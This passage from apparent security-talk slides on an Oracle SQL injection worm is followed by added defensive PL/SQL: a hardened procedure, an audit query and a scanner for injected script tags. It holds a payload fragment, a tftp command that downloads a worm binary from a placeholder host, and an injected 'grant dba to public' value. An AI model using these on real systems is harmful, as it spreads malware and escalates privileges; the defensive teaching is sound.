''''''''commit'''''''';end;'''';END;'';END;--','SYS',0,'1',0) from dual)--
  • 17. What 'could' the worm do
    - Update certain database tables
        The website now starts to distribute malware
        Pwn legitimate users of the site with browser exploits (there are enough 'ie' 0-days out there)
    - OS code execution allows distribution of other worms such as Conficker!
        select LinxRunCmd('tftp -i x.x.x.x GET conflicker.exe') from dual
    - Exploit other Oracle components on the internal network
        Oracle Secure Backup: remote command injection (CPU 2009)
        SQL injection in Oracle Enterprise Manager (CPU 2009)
        TNS Listener exploits (milw0rm: 8507)
        ....100 other things to do....
  • 18. Demos
    Demo 1: Hacking OAS with OAS_hacker.pl
    Demo 2: Privilege escalation; extracting data with SYS privileges (visit www.notsosecure.com)
    Demo 3: O.S code execution with Java (@ notsosecure)
    Demo 4: P.O.C for a potential Oracle SQL injection worm
  • 19. Thank You
    References:
      http://www.red-database-security.com/exploits/oracle_sql_injection_oracle_kupw$worker2.html
      http://www.red-database-security.com/exploits/oracle_sql_injection_oracle_lt_findricset.html
      http://www.breach.com/resources/breach-security-labs/alerts/breach-security-labs-releases-alert-on-oracle-application-ser
      http://www.red-database-security.com/exploits/oracle-sql-injection-oracle-dbms_export_extension.html
      http://sec.hebei.com.cn/bbs_topic.do?forumID=18&postID=4275&replyID=0&skin=1&saveSkin=true&pages=0&replyNum
      http://milw0rm.com/exploits/3269
      http://www.securityfocus.com/bid/17699
      http://www.orafaq.com/wiki/PL/SQL_FAQ#What_is_the_difference_between_SQL_and_PL.2FSQL.3F
      http://www.red-database-security.com/wp/confidence2009.pdf
      http://alloracletech.blogspot.com/2008/07/authid-definer-vs-authid-currentuser.html
      http://www.owasp.org/index.php/Testing_for_Oracle
      http://www.red-database-security.com/wp/google_oracle_hacking_us.pdf
      http://lab.mediaservice.net/notes_more.php?id=Oracle_Portal_for_Friends
      http://www.blackhat.com/presentations/bh-usa-05/bh-us-05-fayo.pdf
    And lots more; can't fit in the space here....
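The fix for the orasso.test procedure shown on slides 6 and 9, plus an audit query for the definer-rights dynamic SQL that slide 4 and slide 13 turn on. This is an added example, not code from the talk or from Oracle; the test_vulnerable/test_hardened names and the allow-list entry are assumptions, and the audit query assumes access to the DBA_ views.

```plsql
-- Vulnerable shape from slides 6 and 9: definer rights (the default) and the
-- caller-supplied parameter concatenated straight into a dynamic PL/SQL block.
CREATE OR REPLACE PROCEDURE orasso.test_vulnerable (q IN VARCHAR2) AS
BEGIN
  -- q = null;execute immediate 'grant dba to public'  runs here with ORASSO's privileges
  EXECUTE IMMEDIATE 'begin ' || q || '; end;';
END test_vulnerable;
/

-- Hardened form (added example, not the talk's code). Three changes:
--   1. AUTHID CURRENT_USER: the dynamic block runs with the caller's privileges,
--      so a web user reaching it through the DAD gains nothing from the definer.
--   2. DBMS_ASSERT.SQL_OBJECT_NAME only returns names of existing objects and
--      raises ORA-44002 for anything else, so ';', quotes and a second
--      EXECUTE IMMEDIATE never reach the parser.
--   3. An explicit allow-list (hypothetical entry) decides which procedures the
--      web tier may call at all; a valid object name is not the same as a permitted one.
CREATE OR REPLACE PROCEDURE orasso.test_hardened (q IN VARCHAR2)
  AUTHID CURRENT_USER
AS
  TYPE name_list IS TABLE OF VARCHAR2(128);
  allowed   CONSTANT name_list := name_list('ORASSO.HOME');  -- hypothetical allow-list
  safe_name VARCHAR2(128);
  permitted BOOLEAN := FALSE;
BEGIN
  safe_name := SYS.DBMS_ASSERT.SQL_OBJECT_NAME(q);          -- ORA-44002 on injection attempts
  FOR i IN 1 .. allowed.COUNT LOOP
    IF UPPER(safe_name) = allowed(i) THEN
      permitted := TRUE;
    END IF;
  END LOOP;
  IF NOT permitted THEN
    RAISE_APPLICATION_ERROR(-20001, 'procedure not permitted: ' || safe_name);
  END IF;
  EXECUTE IMMEDIATE 'begin ' || safe_name || '; end;';
END test_hardened;
/

-- Audit query: definer-rights program units whose source builds dynamic SQL
-- by concatenation (the slide 13 STMTSTRING pattern). Heuristic: it only
-- catches lines where the call and the '||' share a source line, so review
-- hits by hand and expect some multi-line cases to be missed.
SELECT DISTINCT p.owner, p.object_name, s.type, s.line, s.text
  FROM dba_procedures p
  JOIN dba_source s
    ON s.owner = p.owner
   AND s.name  = p.object_name
 WHERE p.authid = 'DEFINER'
   AND REGEXP_LIKE(s.text, 'EXECUTE\s+IMMEDIATE|DBMS_SQL\.PARSE', 'i')
   AND s.text LIKE '%||%'
 ORDER BY p.owner, p.object_name, s.line;
```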
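The defender's mirror of the slide 16 worm loop: it walks the same USERS-tablespace VARCHAR columns the payload targets, but counts rows that already carry an injected script tag, so a compromise of the kind the talk describes shows up in the data itself. Added example, not from the talk; it assumes the scanning user can SELECT from the application tables (tables it cannot read are reported and skipped) and that output goes through DBMS_OUTPUT.

```plsql
SET SERVEROUTPUT ON
DECLARE
  stmt       VARCHAR2(4000);
  hit_count  PLS_INTEGER;
  total_hits PLS_INTEGER := 0;
  -- signature of what the slide 16 payload appends: <script ... src=...
  script_pat CONSTANT VARCHAR2(64) := '<script[^>]*src=';
BEGIN
  FOR col IN (
    SELECT t.owner, t.table_name, c.column_name
      FROM all_tables t
      JOIN all_tab_columns c
        ON c.owner = t.owner AND c.table_name = t.table_name
     WHERE t.tablespace_name = 'USERS'        -- the worm's own column selection
       AND c.data_type LIKE '%VARCHAR%'
       AND c.data_length > 200
  ) LOOP
    -- identifiers come from the catalog, but quoting them via DBMS_ASSERT keeps
    -- this scanner from repeating the concatenation mistake it is looking for
    stmt := 'SELECT COUNT(*) FROM '
         || SYS.DBMS_ASSERT.ENQUOTE_NAME(col.owner, FALSE) || '.'
         || SYS.DBMS_ASSERT.ENQUOTE_NAME(col.table_name, FALSE)
         || ' WHERE REGEXP_LIKE('
         || SYS.DBMS_ASSERT.ENQUOTE_NAME(col.column_name, FALSE)
         || ', :pat, ''i'')';
    BEGIN
      -- the pattern travels as a bind variable, never as concatenated text
      EXECUTE IMMEDIATE stmt INTO hit_count USING script_pat;
      IF hit_count > 0 THEN
        total_hits := total_hits + hit_count;
        DBMS_OUTPUT.PUT_LINE(col.owner || '.' || col.table_name || '.' || col.column_name
                             || ': ' || hit_count || ' row(s) carry a script tag');
      END IF;
    EXCEPTION
      WHEN OTHERS THEN   -- typically ORA-00942 / ORA-01031 on tables this user cannot read
        DBMS_OUTPUT.PUT_LINE('skipped ' || col.owner || '.' || col.table_name
                             || ': ' || SQLERRM);
    END;
  END LOOP;
  DBMS_OUTPUT.PUT_LINE('total rows flagged: ' || total_hits);
END;
/
```

A non-zero total means the slide 16 payload, or something shaped like it, has already run against this schema; the flagged columns are the ones to restore and the rows give the timeline to correlate against.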